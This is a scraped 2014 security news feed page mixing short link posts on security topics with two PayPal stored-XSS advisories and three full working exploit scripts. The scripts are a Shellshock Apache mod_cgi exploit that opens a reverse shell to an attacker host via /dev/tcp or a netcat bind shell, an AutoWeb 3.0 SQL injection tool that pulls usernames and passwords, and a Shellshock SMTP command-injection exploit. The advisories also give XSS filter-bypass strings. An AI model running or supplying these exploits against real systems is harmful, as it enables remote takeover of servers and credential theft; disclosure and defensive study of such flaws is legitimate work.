Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

The art of disrespecting AV (and other old-school controls), Part 2

October 5, 2014, 10:04 am
$
0
0
n December 2013 I posted about  ‘The art of disrespecting AV (and other old-school controls)‘. I saw people retweeting it at that time and was quite happy that it generated some small feedback. It was meant to stimulate some discussion, but also be a reflection on security controls in general – it’s sometimes good to just step back and think a bit more on what they are and how to use them properly

more here..........http://www.hexacorn.com/blog/2014/10/05/the-art-of-disrespecting-av-and-other-old-school-controls-part-2/
Search

mysql_forensics

October 5, 2014, 10:04 pm
$
0
0
Due to my Master Thesis i developed some scripts to analyse mysql-database systems.

more here.........https://github.com/KasperFridolin/mysql_forensics

x509test

October 6, 2014, 3:00 am
$
0
0
x509test is a software written in Python 3 that test the x509 certificate verification process of the target SSL/TLS client. The inspiration of this software comes from multiple reports on the insecurity of a SSL/TLS client due to incorrect verification of x509 certificate chain. This phenomenon is caused by many factors. One of which is the lack of negative feedback from over-acceptance of invalid certificates. This software is an attempt to increase the security of a client-side SSL/TLS software by providing negative feedbacks to the developers.

more here..........https://github.com/yymax/x509test

PayPal Inc Bug Bounty #53 - Multiple Persistent Vulnerabilities

October 6, 2014, 4:22 am
$
0
0
Document Title:
===============
PayPal Inc Bug Bounty #53 - Multiple Persistent Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=835


Release Date:
=============
2014-09-29


Vulnerability Laboratory ID (VL-ID):
====================================
835


Common Vulnerability Scoring System:
====================================
4.3


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent input validation web vulnerabilities in the official PayPal Inc GP+ online service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-09-29:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: GP+ - Application Service 2013 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official PayPal Inc GP+ online service web-application.
The vulnerability allows an attacker to inject own malicious script codes to the application side (persistent) of the vulnerable module.

The persistent input validation vulnerabilities are located `New page title Add` and `Create a new META-description` input values of the
`Improvement-Plan` module. Remote attacker are able to inject own persistent script codes by generating the search-engine-content list.
The attack vector is persistent on the application-side of the vulnerable service and the request method to inject the code is POST.

To exploit the persistent bugs the attacker needs to bypass with 2 different ways the validation of the meta tag and page titel input fields.

Page Title Input Bypass
In the first example method the attacker can use %20``> to split the request and closes the tag with < >.  All after the closed
ending tag will execute the code. At the end the example should look like ... %20``>+[Random Context]+< >[PERSISTENT INJECTED SCRIPT CODE!]

Meta Tag Bypass
In the second example method the attacker needs to match the meta tag word validation by including any random word. After the random
word he includes ><> to close the mask, then he opens with ``< a new (note: meta tags splitted with ,) and can execute after the ``<   ``>
his own script code.  At the end the example should look like ... [Random Word as TAG], ><>``<   ``>< ``><[PERSISTENT INJECTED SCRIPT CODE!]<

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.3.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account but only low user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Service(s):
                                [+] Paypal Inc - GP+

Vulnerable Module(s):
                                [+] Improvement-Plan > Create a new page title

Vulnerable Parameter(s):
                                [+] New page title Add (name)
                                [+] Create a new META-description (tag)

Affected Module(s):
                                [+] Preview Improve Page - Listing
                                [+] Meta Tag - Listing


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers with low privileged application user account and low or medium
required user interaction. For demonstration or reproduce ...

PoC:
%20">< >"<[PERSISTENT INJECTED SCRIPT CODE!]<
... or
PENTEST INJECTED SCRIPT CODE ><>"<">< "><[PERSISTENT INJECTED SCRIPT CODE!]<


Review: Preview improve page - Listing

Module:         Create a new page title > New page title Add
Affected:       Preview improve page - Listing

<div id="preview-seo-improvement-plan">
<div id="search-engine-content">
<a id="heading" href="#">a</a>
<p>%20">%20">><<<[PERSISTENT INJECTED SCRIPT CODE!]) <</iframe></p>
<a href="#">http://maja.com/impressum.php</a> - <span>in cache</span>
</div></div>



Review: Meta TAG - Listing

Module:         Create a new page title > Create a new META-description
Affected:       Meta TAG - Listing

<div id="notifier">
<p class="notifier-heading">Improve page <input id="page-number" name="page" value="0"> of 1</p>
<p class="notifier-text">Each page should have unique title and META description. Create a title that describes
in a few words what can be found on this page. The META description is used in the search results. Describe in 1
or 2 short sentences what this page is about.</p></div>

<div id="preview-seo-improvement-plan">
<div id="search-engine-content">
<a id="heading" href="#">MaJa - Ihr Partner in Fragen Webdesign, Webhosting, Webpromotion, Prasentationen...</a>
<p>hello, merlin, [PENTEST INJECTED SCRIPT CODE!]+ben><>"<
">><>"<</iframe></p>
<a href="#">http://www.vulnerability-lab.com/[o_O]</a> - <span>in cache</span>
</div></div>


Reference(s):
                https://www.paypal-gpplus.com/en/dashboard/improvement-plan/2729702/step2/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by parsing the web context of the Create a new META-description and New page title Add input fields.
Do not forget to seperate parse the vulnerable output listing of the vulnerable values to fix the issue.


Security Risk:
==============
The security risk of the persistent input validation vulnerabilities and filter bypass method are estimated as medium. (CVSS 4.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Paypal Inc Bug Bounty #30 - Filter Bypass & Persistent Vulnerabilities

October 6, 2014, 4:23 am
$
0
0
Document Title:
===============
Paypal Inc Bug Bounty #30 - Filter Bypass & Persistent Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=705


Release Date:
=============
2014-09-26


Vulnerability Laboratory ID (VL-ID):
====================================
705


Common Vulnerability Scoring System:
====================================
4.3


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official PayPal Here mobile notify me online service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-09-26:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
2 persistent POST Inject Vulnerabilities has been discovered in the official PayPal Here mobile Notify Me online service web-application.
The vulnerability allows remote attackers to inject own malicious script code on the application-side of the vulnerable web function.

The first 2 vulnerabilities are located in the `first_name` and `last_name` values of the `Notify Me` online service web-application.
Remote attacker are able to inject own malicious script codes in the firstname and lastname values of the Notify Me send POST method request.
The execution of the injected script code occurs in the `biz.paypal` notify mail that arrives after the successful POST method request of the
paypal api and web-application. The context execution is located in the mail header next to the introduction to the paypal customer.

A input filter validation bypass vulnerability has been discovered in the official PayPal Here mobile Notify Me online service web-application.
To inject the values the attacker needs to use a session tamper to interact.

During the pentests the input fields disallows to insert of script codes (firstname & lastname). We tried to manipulate the POST request which
is not connected to the input validation form (after a first load) with own malicious test values. The result was the successful execution of
the malicious test code in the paypal notify me service mail. The protection of the input was not connected to the session request which results
in a successful bypass by manipulation of the post values after the first web request.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] PayPal Here - Notify Me

Vulnerable Input Field(s):
                                [+] Firstname
                                [+] Lastname

Vulnerable Parameter(s):
                                [+] first_name
                                [+] last_name

Affected Module(s):
                                [+] Notification Mail - You’re in line to get PayPal Here™


Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the application-side vulnerability ...

1. Open the paypal.com website and surf to the notify me service application site (https://www.paypal.com/webapps/mpp/credit-card-reader)
2. Include your email and the random company name, firstname and lastname as regular (Do not save to notify yet!)
3. Start a session tamper to manipulate the request after the first attempt
4. Change the vulnerable firstname and lastname values with own script code payloads and continue to intercept the request
5. Open your mailbox and review the arrived paypal inc notify me service mail of the website formular
6. The persistent execution occurs in the header location next to the paypal customer introduction word `Dear [First-&Lastname]`
Note: The attacker is now able to manipulate the complete mail body and header of the notify me context to compromise other user accounts
7. Successful reproduce of the remote vulnerability!


PoC:  Notification Mail - Firstname & Lastname

<td style="font-family:verdana,sans-serif; font-size:13px; color:rgb(54, 54, 54);
text-align:left; "><div class="mktEditable" id="copy"><p><br><span style="font-family: arial,helvetica,sans-serif;
font-size: 12px;">Dear svenja "><[PERSISTENT INJECET SCRIPT CODE! FIRSTNAME & LASTNAME];)" <, <="" span=""></p>
<p><span style="font-family: arial,helvetica,sans-serif; font-size: 12px;">
Thank you for your interest in PayPal Here!  You are now a confirmed member of the PayPal Here “
Exclusive Release” wait list.
 PayPal Here will be available shortly and you will be notified with instructions on how to get your free mobile
card reader and access to the app through iTunes or the Android Market (Play).</span></p>
<p><span style="font-family: arial,helvetica,sans-serif; font-size: 12px;">PayPal Here will make a big difference to your business.
 Instead of chasing payments or missing out on sales, you’ll be able to plug the card reader into your smart
phone and get paid on the spot. </span></p>


--- PoC Session Logs [POST] ---
POST (Request): Standard
oid=00D300000000LaY
ret
URL=https%3A%2F%2Fwww.paypal.com%2Fwebapps%2Fmpp%2Fcredit-card-reader-thank-you
lead_source=Web-KNLBSTR
recordType=012800000003bgg
Campaign_ID=70180000000MGgf
email=bkm@evolution-sec.com
first_name=Benjamin
last_name=KunzMejri
mobile=01776713371337
url=http%3A%2F%2Fwww.vulnerability-lab.com
company=vulnerabilitylab
Additional_Services__c=Android

POST (Request): Manipulated
oid=00D300000000LaY
ret
URL=https%3A%2F%2Fwww.paypal.com%2Fwebapps%2Fmpp%2Fcredit-card-reader-thank-you
lead_source=Web-KNLBSTR
recordType=012800000003bgg
Campaign_ID=70180000000MGgf
email=bkm@evolution-sec.com
first_name=<[PERSISTENT INJECTED SCRIPT CODE! #1]>
last_name="><[PERSISTENT INJECTED SCRIPT CODE! #1]<
mobile=01776713371337
url=http%3A%2F%2Fwww.vulnerability-lab.com
company=vulnerabilitylab
Additional_Services__c=1337kungfu_0ne


Reference(s):
https://www.paypal.com/webapps/mpp/credit-card-reader
https%3A%2F%2Fwww.paypal.com%2Fwebapps%2Fmpp%2Fcredit-card-reader-thank-you


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the firstname and lastname values in the notify me POST method request.
Restrict the notify me input fields and disallow special chars. Parse the in the outgoing mail context the names that are stored in the
dbms to prevent further script code executions. Connect a token to the session to prepare exceptions that prevent malicious interaction.


Security Risk:
==============
The security risk of the two persistent input validation vulnerabilities via POST method request are estimated as medium.
The security risk of the filter bypass vulnerability e in the paypal inc notify me form is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Pwning the kernel && root

October 6, 2014, 4:26 am
$
0
0
This time we'll discuss how to use the basic building block of the limited form of kernel-write we found last time in order to get unrestricted write to the kernel, and ultimately root privileges.

more here...........http://blog.nativeflow.com/pwning-the-kernel-root

Revisiting Android disk encryption

October 6, 2014, 4:36 am
$
0
0
In iOS 8, Apple has expanded the scope of data encryption and now mixes in the user's passcode with an unextractable hardware UID when deriving an encryption key, making it harder to extract data from iOS 8 devices. This has been somewhat of a hot topic lately, with opinions ranging from praise for Apple's new focus on serious security, to demands for "golden keys" to mobile devices to be magically conjured up. Naturally, the debate has spread to other OS's, and Google has announced that the upcoming Android L release will also have disk encryption enabled by default. Consequently, questions and speculation about the usefulness and strength of Android's disk encryption have sprung up on multiple forums, so this seems like a good time to take another look at its implementation. While Android L still hasn't been released yet, some of the improvements to disk encryption it introduces are apparent in the preview release, so this post will briefly introduce them as well.

This post will focus on the security level of disk encryption

more here.............http://nelenkov.blogspot.com/2014/10/revisiting-android-disk-encryption.html

SOLDIER OF FORTRAN

October 6, 2014, 4:43 am
$
0
0
On this site you will find the only known collection of mainframe hacking tools and links to mainframe hacking weblogs

more here............http://soldieroffortran.org/index.html
Search

Apache mod_cgi - Remote Exploit (Shellshock)

October 6, 2014, 4:47 am
$
0
0
#! /usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys

stop = False
proxyhost = ""
proxyport = 0

def usage():
    print """

        Shellshock apache mod_cgi remote exploit

Usage:
./exploit.py var=<value>

Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy

Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)

Example:

./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234

Credits:

Federico Galatolo 2014
"""
    sys.exit(0)

def exploit(lhost,lport,rhost,rport,payload,pages):
    headers = {"Cookie": payload, "Referer": payload}
   
    for page in pages:
        if stop:
            return
        print "[-] Trying exploit on : "+page
        if proxyhost != "":
            c = httplib.HTTPConnection(proxyhost,proxyport)
            c.request("GET","http://"+rhost+page,headers=headers)
            res = c.getresponse()
        else:
            c = httplib.HTTPConnection(rhost)
            c.request("GET",page,headers=headers)
            res = c.getresponse()
        if res.status == 404:
            print "[*] 404 on : "+page
        time.sleep(1)
       

args = {}
   
for arg in sys.argv[1:]:
    ar = arg.split("=")
    args[ar[0]] = ar[1]
try:
    args['payload']
except:
    usage()
   
if args['payload'] == 'reverse':
    try:
        lhost = args['lhost']
        lport = int(args['lport'])
        rhost = args['rhost']
        payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
    except:
        usage()
elif args['payload'] == 'bind':
    try:
        rhost = args['rhost']
        rport = args['rport']
        payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
    except:
        usage()
else:
    print "[*] Unsupported payload"
    usage()
   
try:
    pages = args['pages'].split(",")
except:
    pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]

try:
    proxyhost,proxyport = args['proxy'].split(":")
except:
    pass
           
if args['payload'] == 'reverse':
    serversocket = socket(AF_INET, SOCK_STREAM)
    buff = 1024
    addr = (lhost, lport)
    serversocket.bind(addr)
    serversocket.listen(10)
    print "[!] Started reverse shell handler"
    thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
    serversocket = socket(AF_INET, SOCK_STREAM)
    addr = (rhost,int(rport))
    thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
   
buff = 1024
   
while True:
    if args['payload'] == 'reverse':
        clientsocket, clientaddr = serversocket.accept()
        print "[!] Successfully exploited"
        print "[!] Incoming connection from "+clientaddr[0]
        stop = True
        clientsocket.settimeout(3)
        while True:
            reply = raw_input(clientaddr[0]+"> ")
            clientsocket.sendall(reply+"\n")
            try:
                data = clientsocket.recv(buff)
                print data
            except:
                pass
       
    if args['payload'] == 'bind':
        try:
            serversocket = socket(AF_INET, SOCK_STREAM)
            time.sleep(1)
            serversocket.connect(addr)
            print "[!] Successfully exploited"
            print "[!] Connected to "+rhost
            stop = True
            serversocket.settimeout(3)
            while True:
                reply = raw_input(rhost+"> ")
                serversocket.sendall(reply+"\n")
                data = serversocket.recv(buff)
                print data
        except:
            pass



Authored by Federico Galatolo



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

AutoWeb 3.0 - (noticias.php id_cat) SQL Injection Exploit

October 6, 2014, 4:49 am
$
0
0
#!/usr/bin/env python
#-*- coding:utf-8 -*-
 
# Title        : AutoWeb v3.0 (noticias.php id_cat) SQL Injection Exploit
# Author       : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home         : http://milw00rm.com / its online
# Download     : http://www.multdivision.com.br
# Other Vuln.  : http://www.1337day.com/exploit/22697 / thks: Felipe Andrian Peixoto
# date         : 28/09/2014
# Python       : V 2.7
# Thks         : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
   
import sys, urllib2, re, os, time
   
if len(sys.argv) < 2:
    os.system(['clear','cls'][1])
    print " ____________________________________________________________________"
    print "|                                                                    |"
    print "|   AutoWeb v3.0 (noticias.php id_cat) SQL Injection Exploit         |"
    print "|   ZoRLu / milw00rm.com                                             |"
    print "|   exploit.py http://site.com/path/                                 |"
    print "|____________________________________________________________________|"
    sys.exit(1)
 
koybasina = "http://"
koykicina = "/"
sitemiz = sys.argv[1]

if sitemiz[-1:] != koykicina:
    sitemiz += koykicina
     
if sitemiz[:7]  != koybasina:
    sitemiz =  koybasina + sitemiz
 
vulnfile = "noticias.php"
sql = "?id_cat=0x90+/*!12345union*/+/*!12345select*/+1,concat(0x3a3a3a,username,0x3a3a3a),concat(0x3b3b3b,senha,0x3b3b3b),4,5,6,7,8,9,10+/*!12345from*/+/*!12345user*/--"
url = sitemiz + vulnfile + sql
 
print "\nExploiting...\n"
 
try:
    veri = urllib2.urlopen(url).read()
    aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
    if len(aliver) > 0:
        print "username:  " + aliver[0][0] + aliver[0][1] +aliver[0][2]
    else:
        print "Exploit failed..."
         
 
except urllib2.HTTPError:
    print "Security!"

   
try:
    veri = urllib2.urlopen(url).read()
    aliver = re.findall(r";;;(.*)([0-9a-fA-F])(.*);;;", veri)
    if len(aliver) > 0:
        print "password:  " + aliver[0][0] + aliver[0][1] +aliver[0][2]
                 
        print "\nGood Job Bro!"
    else:
        print "Exploit failed..."
         
 
except urllib2.HTTPError:

    print "Security!"



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Postfix SMTP - Shellshock Exploit

October 6, 2014, 4:52 am
$
0
0
#!/bin/python
# Exploit Title:  Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr (Phil Blank)
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271

from socket import *
import sys

def usage():
    print "shellshock_smtp.py <target> <command>"

argc = len(sys.argv)
if(argc < 3 or argc > 3):
    usage()
    sys.exit(0)

rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]

headers = ([
    "To",
    "References",
    "Cc",
    "Bcc",
    "From",
    "Subject",
    "Date",
    "Message-ID",
    "Comments",
    "Keywords",
    "Resent-Date",
    "Resent-From",
    "Resent-Sender"
    ])

s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))

# banner grab
s.recv(2048*4)

def netFormat(d):
    d += "\n"
    return d.encode('hex').decode('hex')

data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)

data = netFormat("rcpt to:<nobody>")
s.send(data)
s.recv(2048*4)

data = netFormat("data")
s.send(data)
s.recv(2048*4)

data = ''
for h in headers:
    data += netFormat(h + ":() { :; };" + cmd)

data += netFormat(cmd)

# <CR><LF>.<CR><LF>
data += "0d0a2e0d0a".decode('hex')

s.send(data)
s.recv(2048*4)

data = netFormat("quit")
s.send(data)
s.recv(2048*4)



//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information

LM Hash Cracking – Rainbow Tables vs GPU Brute Force

October 6, 2014, 8:39 am
$
0
0
Lately, Eric Gruber and I have been speaking about the cracking box that we built at NetSPI. Every time we present, the same question always comes up.

“What about Rainbow Tables?”

Our standard response has been that we don’t need them anymore. I honestly haven’t needed (or heavily used) them for a while now, as our cracking box has been able to crack the majority of the hashes that we throw at it. This got me thinking about what the actual tradeoffs are for using our GPUs to crack LM hashes versus using the more traditional method of Rainbow Tables.

more here...........https://www.netspi.com/blog/entryid/241/lm-hash-cracking-rainbow-tables-vs-gpu-brute-force

Bugzilla Zero-Day Exposes Zero-Day Bugs

October 6, 2014, 9:29 am
$
0
0
A previously unknown security flaw in Bugzilla — a popular online bug-tracking tool used by Mozilla and many of the open source Linux distributions — allows anyone to view detailed reports about unfixed vulnerabilities in a broad swath of software. Bugzilla is expected today to issue a fix for this very serious weakness, which potentially exposes a veritable gold mine of vulnerabilities that would be highly prized by cyber criminals and nation-state actors.


more here..........http://krebsonsecurity.com/2014/10/bugzilla-zero-day-exposes-zero-day-bugs/

Yahoo! Has been HACKED, and all your information with them is now in danger!

October 6, 2014, 9:35 am
$
0
0
All stemming from them not keeping up with technology and failing to patch a world-known vulnerability!

more here...........https://webcache.googleusercontent.com/search?q=cache:I8s8KmZhwXMJ:www.futuresouth.us/yahoo_hacked.html+&cd=1&hl=en&ct=clnk&client=firefox-a

SHELLSHOCK – HANDS-ON

October 6, 2014, 9:38 am
$
0
0
In my previous post I gave an overview about the key events that happened during the week that GNU Bash vulnerability – Shellshock – got disclosed. In this post would like to demonstrate a hand’s on scenario that will allow one to have a better practical understanding on how someone could exploit the Shellshock vulnerability using HTTP requests to CGI scripts.

more here...........http://countuponsecurity.com/2014/10/06/shellshock-hands-on/
Search

AT&T Hit By Insider Breach- Congress Should Require Credit Issuers to Access Centralized Database of Known Compromised Individuals

October 6, 2014, 1:53 pm
$
0
0
AT&T is warning consumers about a data breach involving an insider who illegally accessed the personal information of an unspecified number of users. The compromised data includes Social Security numbers and driver’s license numbers. - See more at: http://threatpost.com/att-hit-by-insider-breach/108705#sthash.Xk5pxLk3.dpuf


